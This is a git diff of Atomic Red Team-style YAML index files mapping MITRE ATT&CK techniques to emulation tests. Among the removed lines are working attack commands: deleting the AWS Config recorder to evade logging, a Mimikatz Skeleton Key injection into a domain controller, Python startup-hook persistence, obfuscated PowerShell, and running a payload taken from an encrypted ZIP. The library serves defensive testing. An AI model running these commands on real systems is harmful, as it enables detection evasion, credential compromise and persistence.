modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44182,7 +44174,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -55896,7 +55887,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/iaas_aws-index.yaml
+8 -73
View File
@@ -11173,61 +11173,6 @@ defense-evasion:
cleanup_command:
name: sh
elevation_required: false
- name: AWS - Config Logs Disabled
auto_generated_guid: 4608bc1b-e682-466b-a7d7-dbd76760db31
description: 'Disables AWS Config by stopping the configuration recorder, deleting
the delivery channel, and deleting the configuration recorder. An attacker
with sufficient permissions can use this to stop configuration change recording
and avoid detection of subsequent activity.
'
supported_platforms:
- iaas:aws
input_arguments:
configuration_recorder_name:
description: Name of the configuration recorder
type: string
default: redatomictestconfigurationrecorder
delivery_channel_name:
description: Name of the delivery channel
type: string
default: redatomictestdeliverychannel
region:
description: Name of the region
type: string
default: us-west-2
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
default profile using: aws configure
'
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: 'echo Please install terraform and configure your AWS
default profile
'
executor:
command: |
aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder stopped ***"
aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
echo "*** Delivery channel deleted ***"
aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder deleted ***"
cleanup_command: aws configservice list-configuration-recorders --region us-west-2
name: sh
elevation_required: false
T1564.003:
technique:
type: attack-pattern
@@ -11895,7 +11840,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11925,7 +11870,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20610,7 +20554,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20646,7 +20590,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23493,7 +23436,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23516,7 +23459,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27838,7 +27780,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27859,7 +27801,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -32284,7 +32225,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32320,7 +32261,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32806,7 +32746,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32836,7 +32776,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34607,7 +34546,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34634,7 +34573,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -35036,7 +34974,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -45070,7 +45007,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45100,7 +45037,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -57029,7 +56965,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/iaas_azure-index.yaml
+8 -18
View File
@@ -11550,7 +11550,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11580,7 +11580,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20441,7 +20440,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20477,7 +20476,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23409,7 +23407,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23432,7 +23430,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27617,7 +27614,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27638,7 +27635,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -32118,7 +32114,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32154,7 +32150,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32640,7 +32635,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32670,7 +32665,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34526,7 +34520,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34553,7 +34547,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34955,7 +34948,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -45237,7 +45229,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45267,7 +45259,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -57280,7 +57271,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/iaas_gcp-index.yaml
+8 -18
View File
@@ -11511,7 +11511,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11541,7 +11541,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20350,7 +20349,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20386,7 +20385,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23350,7 +23348,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23373,7 +23371,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27558,7 +27555,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27579,7 +27576,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31976,7 +31972,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32012,7 +32008,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32498,7 +32493,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32528,7 +32523,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34416,7 +34410,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34443,7 +34437,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34845,7 +34838,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44747,7 +44739,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44777,7 +44769,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56560,7 +56551,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/index.yaml
+47 -2315
View File
@@ -2048,10 +2048,10 @@ defense-evasion:
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
Ignore
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
@@ -2066,59 +2066,15 @@ defense-evasion:
command: |-
$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
-ErrorAction Ignore
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
- name: Password-Protected ZIP Payload Extraction and Execution
auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
description: |
Extracts and executes a script from a password-protected ZIP archive.
This technique is commonly used by malware families like Emotet and QBot to deliver payloads
via email attachments where the password is provided in the message body.
The encrypted ZIP evades static file analysis until extracted at runtime.
Upon successful execution, displays confirmation and system information.
supported_platforms:
- linux
- macos
input_arguments:
zip_password:
description: Password used to protect the ZIP archive
type: String
default: infected
dependency_executor_name: bash
dependencies:
- description: 'zip and unzip must be installed
'
prereq_command: 'which zip && which unzip
'
get_prereq_command: 'echo "Install zip and unzip using your package manager
(apt-get, yum, or brew)"
'
executor:
command: |
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
cleanup_command: |
rm -f /tmp/art_payload.sh
rm -f /tmp/art_encrypted.zip
name: bash
T1014:
technique:
type: attack-pattern
@@ -23901,22 +23857,6 @@ defense-evasion:
'
name: command_prompt
- name: Obfuscated PowerShell Command via Character Array
auto_generated_guid: 6683baf0-6e77-4f58-b114-814184ea8150
description: "Spawns a child PowerShell process using character array obfuscation.
\nBoth the PowerShell binary name and executed command are constructed \nfrom
ASCII values at runtime to evade string-based detection.\n"
supported_platforms:
- windows
executor:
command: |
$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)
cleanup_command: |
taskkill /f /im calculator.exe >nul 2>nul
taskkill /f /im CalculatorApp.exe >nul 2>nul
name: powershell
T1556.006:
technique:
type: attack-pattern
@@ -27184,61 +27124,6 @@ defense-evasion:
get_prereq_command: 'gcloud auth login --no-launch-browser
'
- name: AWS - Config Logs Disabled
auto_generated_guid: 4608bc1b-e682-466b-a7d7-dbd76760db31
description: 'Disables AWS Config by stopping the configuration recorder, deleting
the delivery channel, and deleting the configuration recorder. An attacker
with sufficient permissions can use this to stop configuration change recording
and avoid detection of subsequent activity.
'
supported_platforms:
- iaas:aws
input_arguments:
configuration_recorder_name:
description: Name of the configuration recorder
type: string
default: redatomictestconfigurationrecorder
delivery_channel_name:
description: Name of the delivery channel
type: string
default: redatomictestdeliverychannel
region:
description: Name of the region
type: string
default: us-west-2
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
default profile using: aws configure
'
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: 'echo Please install terraform and configure your AWS
default profile
'
executor:
command: |
aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder stopped ***"
aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
echo "*** Delivery channel deleted ***"
aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder deleted ***"
cleanup_command: aws configservice list-configuration-recorders --region us-west-2
name: sh
elevation_required: false
T1564.003:
technique:
type: attack-pattern
@@ -27965,7 +27850,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -27995,54 +27880,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1027.006:
technique:
type: attack-pattern
@@ -46437,7 +46275,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -46473,239 +46311,7 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
